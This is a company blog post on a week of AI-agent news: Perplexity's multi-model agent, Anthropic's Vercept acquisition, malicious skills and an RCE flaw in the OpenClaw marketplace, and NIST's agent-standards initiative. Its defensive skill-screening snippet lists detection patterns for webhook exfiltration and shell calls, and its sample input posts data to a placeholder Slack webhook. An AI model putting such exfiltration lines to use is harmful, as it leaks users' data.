AI Agents This Week: Products, Acquisitions, and Risks
Ricardo Argüello — February 26, 2026
CEO & Founder
General summary
In one week, Perplexity launched a commercial agent orchestrating 19 models, Anthropic acquired a computer-operating agent startup, and a security report found 340+ malicious skills in a popular open-source agent marketplace. AI agents now have price tags, acquisition multiples, and real attack vectors.
- Perplexity Computer orchestrates 19 AI models to execute full tasks, available at $200/month
- Anthropic's acquisition of Vercept signals that value is shifting from base models to the application layer
- Over 340 malicious skills were found in the OpenClaw marketplace — open-source agents need security vetting before deployment
- NIST launched agent standards that will become compliance requirements for companies selling to the U.S. government
- These developments mark the transition from AI agents as demos to agents as real products with real risks
Imagine three things happening in the same week: a company starts selling an AI assistant that can actually do tasks on your computer, another company buys a startup to make their AI better at operating software, and security researchers find hundreds of dangerous plugins hiding in a popular AI tool store. That’s what just happened — AI agents went from “interesting concept” to products you can buy, invest in, and get attacked through.
AI-generated summary
This Week, AI Agents Stopped Being Demos
Three things happened in 48 hours that would have taken months a year ago. Perplexity launched a commercial product orchestrating 19 AI models to execute full tasks. Anthropic acquired a startup specializing in agents that operate computers. And a security report revealed that the plugin marketplace of one of the most popular open-source agents contains over 340 malicious skills.
AI agents are no longer a keynote promise. They’re products with price tags, eight-figure corporate acquisitions, and — predictably — real attack vectors. At IQ Source, we track these stories weekly because they directly affect the technology decisions of the companies we work with. Here’s our read on what happened and why it matters.
If you’re still figuring out how AI agents fit into your operations, our practical agent playbook for decision-makers gives you the full framework.
Perplexity Computer: 19 Models, One Command
On February 25, Perplexity announced Computer, a system that goes beyond search: it executes complete tasks on your computer. The user describes what they want — “organize last month’s expenses into a spreadsheet” — and the system plans the steps, selects the right models, and executes.
What’s interesting isn’t that an agent can operate a computer. Anthropic demonstrated that with Claude computer use. What makes Perplexity Computer different is multi-model orchestration. Instead of asking one model to do everything, the system assigns each part of the task to the model best suited for it.
Which Model Does What
| Model | Role |
|---|---|
| Claude Opus 4.6 | Complex reasoning and task planning |
| Gemini | Research and information synthesis |
| Nano Banana Pro | Image generation and editing |
| Sonar (Perplexity’s own) | Real-time web search |
| Additional models | Code, document analysis, data processing |
The price: $200/month on the Max tier, with 10,000 monthly credits. According to PYMNTS, tasks cost between 1 and 5 credits depending on complexity, which works out to roughly 2,000 to 10,000 tasks per month.
What This Means for B2B Companies
The multi-model orchestration pattern is exactly what we described in our enterprise agents playbook: don’t use one model for everything — use the right one for each step. Perplexity is packaging that pattern as a consumer product.
For enterprises, the difference is that you can’t route client data, contracts, or financial information through a $200/month SaaS product without security controls, audit trails, or regulatory compliance. The orchestration pattern is sound. The implementation requires your own models, your own infrastructure, and your own rules.
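The routing pattern itself is simple to sketch. The following is an illustrative dispatcher, not Perplexity’s implementation; the model names and task-type labels are assumptions made up for the example.

```python
# Minimal sketch of multi-model orchestration: classify each step of a
# task and route it to the model best suited for that kind of work.
# The registry below is illustrative, not Perplexity's actual routing.

ROUTING = {
    "planning": "reasoning-model",   # complex reasoning / task planning
    "research": "research-model",    # information synthesis
    "search": "web-search-model",    # real-time web search
    "image": "image-model",          # generation and editing
    "code": "code-model",            # code, documents, data processing
}

def route(step_type: str) -> str:
    """Return the model assigned to a step, with a safe default."""
    return ROUTING.get(step_type, "reasoning-model")

def run_task(steps: list[tuple[str, str]]) -> list[str]:
    """Dispatch each step of a planned task to its assigned model."""
    plan = []
    for step_type, description in steps:
        plan.append(f"{route(step_type)}: {description}")
    return plan

# Example: "organize last month's expenses into a spreadsheet"
plan = run_task([
    ("planning", "break the request into steps"),
    ("search", "pull last month's expense records"),
    ("code", "build the spreadsheet"),
])
```

The point of the pattern is the registry: swapping a model for a given step type is a one-line change, which is what makes per-step routing cheaper to evolve than a single do-everything model.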
Anthropic Acquires Vercept: The Bet on Computer-Operating Agents
The same day Perplexity launched Computer, TechCrunch reported that Anthropic acquired Vercept, a San Francisco startup that built “Vy” — an agent capable of operating Mac computers remotely, including opening applications, using interfaces, and executing complete workflows without human intervention.
Vercept had raised $50 million from investors including Spark Capital and Y Combinator, with notable angels from the AI ecosystem. The entire team joined Anthropic, and Vercept will shut down operations on March 25.
This isn’t the first time Anthropic has bought talent instead of building in-house. In December they acquired the team behind Bun, the JavaScript runtime. The pattern is clear: Anthropic is assembling the full stack for AI agents — from the base model to the execution layer that interacts with the real world.
For companies planning their integration strategy, this acquisition reinforces what we’ve been saying: the market is moving toward agents that operate software directly. But the cleanest, most controllable path for most enterprises is still connecting agents to their systems through APIs and standardized protocols like MCP, not having an agent drive the GUI. If you want to explore that route, we have a team dedicated to MCP server development that connects agents to enterprise systems securely.
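The API-first approach can be sketched in a few lines: expose a narrow, typed tool the agent is allowed to call, instead of letting it drive a GUI. This is plain Python for illustration, not the actual MCP SDK; the tool name, schema, and the stubbed enterprise function are hypothetical.

```python
# Sketch of the API-first integration pattern: the agent calls a
# registered, typed tool rather than clicking through an interface.
# Names and the schema are assumptions; a real deployment would expose
# this through an MCP server with authentication and access controls.

def get_invoice_status(invoice_id: str) -> dict:
    """Hypothetical enterprise API the tool wraps (stubbed here)."""
    return {"invoice_id": invoice_id, "status": "paid"}

TOOLS = {
    "get_invoice_status": {
        "description": "Look up the payment status of an invoice",
        "parameters": {"invoice_id": "string"},
        "handler": get_invoice_status,
    },
}

def call_tool(name: str, **kwargs) -> dict:
    """Dispatch an agent's tool call, rejecting anything unregistered."""
    if name not in TOOLS:
        raise ValueError(f"unknown tool: {name}")
    return TOOLS[name]["handler"](**kwargs)

result = call_tool("get_invoice_status", invoice_id="INV-1042")
```

The contrast with GUI-driving agents is the allowlist: the agent can only reach the handlers you registered, with the parameters you declared, which is what makes this route auditable and controllable.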
OpenClaw: What Happens When Security Can’t Keep Up
While Perplexity and Anthropic made their announcements, a less glamorous but more urgent report was circulating in the security community. OpenClaw — the open-source agent that went viral and amassed millions of installations, whose founder recently joined OpenAI — has a serious security problem in its plugin ecosystem.
According to a CNBC analysis based on Cisco research, the OpenClaw skills marketplace is compromised in multiple ways:
- 341+ malicious skills identified — roughly 20% of the total marketplace. They include code that exfiltrates user data, installs backdoors, or redirects queries to external servers.
- CVE-2026-25253 (CVSS 8.8) — a remote code execution vulnerability that allows an attacker to run arbitrary commands on the user’s machine through a seemingly legitimate skill.
- 30,000+ exposed instances — according to The Hacker News, tens of thousands of OpenClaw installations are accessible from the internet without authentication, exposing data and enabling remote execution.
- Exfiltration via messaging — some skills send user data to Slack channels, Discord, or external webhooks without the user’s knowledge.
Why This Matters for Your Company
OpenClaw is a real-time case study of what happens when an agent ecosystem grows faster than its security controls. And it’s not an isolated case — it’s a preview of what can happen with any agent platform that allows third-party extensions without rigorous review.
For B2B companies, the lesson is direct: when evaluating AI agents, the security review can’t stop at the base agent. You need to audit every plugin, skill, or extension connected to the system. This applies to open-source tools and commercial products with integration marketplaces alike.
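As a starting point, even a naive static screen catches the crudest cases, like the messaging-webhook exfiltration seen in OpenClaw. The patterns below are illustrative only; a real audit combines static analysis, sandboxed execution, and permission review.

```python
import re

# Naive static screen of a third-party skill's source before install.
# Patterns are illustrative; this only flags the obvious red flags and
# is no substitute for a full security review.

SUSPICIOUS = [
    (r"hooks\.slack\.com|discord\.com/api/webhooks", "messaging webhook"),
    (r"\bsubprocess\b|\bos\.system\b|\beval\s*\(", "shell or eval"),
    (r"requests\.post\(\s*['\"]https?://", "outbound POST to hardcoded URL"),
]

def screen_skill(source: str) -> list[str]:
    """Return a list of findings; empty means no obvious red flags."""
    return [label for pattern, label in SUSPICIOUS
            if re.search(pattern, source)]

findings = screen_skill(
    'import requests\n'
    'requests.post("https://hooks.slack.com/services/T00/B00", data=d)\n'
)
```

A skill that passes this screen is not safe; a skill that fails it should never reach a deployment queue.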
If your team is already using or evaluating AI code generation tools, our guide on AI-generated code security covers the controls you should have in place.
NIST Puts the Rules on the Table
While the industry builds and acquires at full speed, the U.S. government started bringing order. On February 17, NIST launched an AI agent standards initiative through its Center for AI and Security Intelligence (CAISI).
The initiative has three pillars: industry-led interoperability standards, open-source protocols for agent communication, and security and identity research for autonomous systems. According to SiliconANGLE, NIST published a Request for Information (RFI) on agent security with a March 9 deadline.
This isn’t academic theory. For any company selling to the federal government, defense contracts, or regulated industries like healthcare and finance in the U.S., NIST standards become compliance requirements. If you’re building or deploying agents today, it’s worth designing with these frameworks in mind — building ahead is cheaper than retrofitting later.
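What “designing with auditing from day one” can look like in practice: every agent action goes through a wrapper that records who did what, when, and with which arguments. The decorator, field names, and in-memory log are assumptions for the sketch; a real system would write to append-only, tamper-evident storage.

```python
import functools
import json
import time

# Sketch of audit-by-default for agent actions: each tool invocation
# is recorded with a timestamp, the acting agent, and its arguments.
# The log sink and field names are illustrative assumptions.

AUDIT_LOG: list[dict] = []

def audited(agent_id: str):
    """Decorator that logs every call to an agent-facing action."""
    def wrap(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            AUDIT_LOG.append({
                "ts": time.time(),
                "agent": agent_id,
                "action": func.__name__,
                "args": json.dumps(kwargs, default=str),
            })
            return func(*args, **kwargs)
        return inner
    return wrap

@audited(agent_id="expense-agent-01")
def export_report(month: str) -> str:
    """Hypothetical agent action; the decorator records the call."""
    return f"report-{month}.xlsx"

filename = export_report(month="2026-01")
```

Retrofitting this onto an agent fleet after the fact means touching every integration; adding it as the default call path on day one is a few lines.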
What All of This Means for Your Company
Agents are products, not prototypes. Perplexity is selling access to a multi-model agent for $200/month. Anthropic paid tens of millions to acquire an agent team. The market has decided that AI agents are the next layer of enterprise software — the question for your company isn’t whether to adopt them, but how and with what controls.
Agent security is your problem. OpenClaw proved that a plugin marketplace can become a massive attack vector within months. If your team uses or plans to use agents with third-party extensions — and nearly every AI agent has them — you need a security review process that covers not just the base agent but every integration. The story of WebMCP and open standards for web agents, which we covered in our WebMCP standard analysis, shows why open protocols are preferable to closed plugin ecosystems.
Standards are coming — build forward, not backward. The NIST initiative signals that the regulatory framework for AI agents is on its way. Companies that design their implementations with auditing, traceability, and access controls from day one will spend less on adaptations when standards are finalized. Those that don’t will face costly rework.
This kind of weekly analysis is what we do at IQ Source to keep up with a fast-moving ecosystem. If your leadership team needs this read tailored to your industry and specific technology decisions, let’s talk.
Frequently Asked Questions
What is Perplexity Computer?
It’s an autonomous agent system that orchestrates 19 AI models to complete complex tasks. The user describes a desired outcome, and the system plans, executes, and delivers. It’s available on the Max tier at $200/month with 10,000 monthly credits.
Why are AI companies acquiring agent startups?
Because value is shifting from base models to application layers. Training large models is becoming a commodity; differentiation comes from the ability to take real actions — reading screens, operating software, interacting with systems. Acquisitions aim to integrate these capabilities directly into existing AI products.
What are the risks of deploying open-source AI agents?
Key risks include unaudited dependencies, excessive permissions, and missing access controls designed for enterprise environments. An open-source agent may work technically but lack the logging, action limits, and isolation that any corporate deployment requires. Security evaluation should happen before deployment, not after.
What is NIST doing about AI agents?
NIST launched an initiative with three pillars: industry-led standards, open-source protocols, and security and identity research for agents. If your company sells to the U.S. government or regulated industries, these will become compliance requirements. The public comment deadline is March 9.
Related Articles
LiteLLM Attack: Your AI Trust Chain Just Broke
LiteLLM, the AI API key proxy with 97 million monthly downloads, was poisoned via PyPI. Your security scanner was the entry point.
Google Stitch + AI Studio: Design-to-Code Without Engineers
Google shipped a full design-to-production pipeline with Stitch and AI Studio. Where it works for B2B prototypes and where you still need real engineering.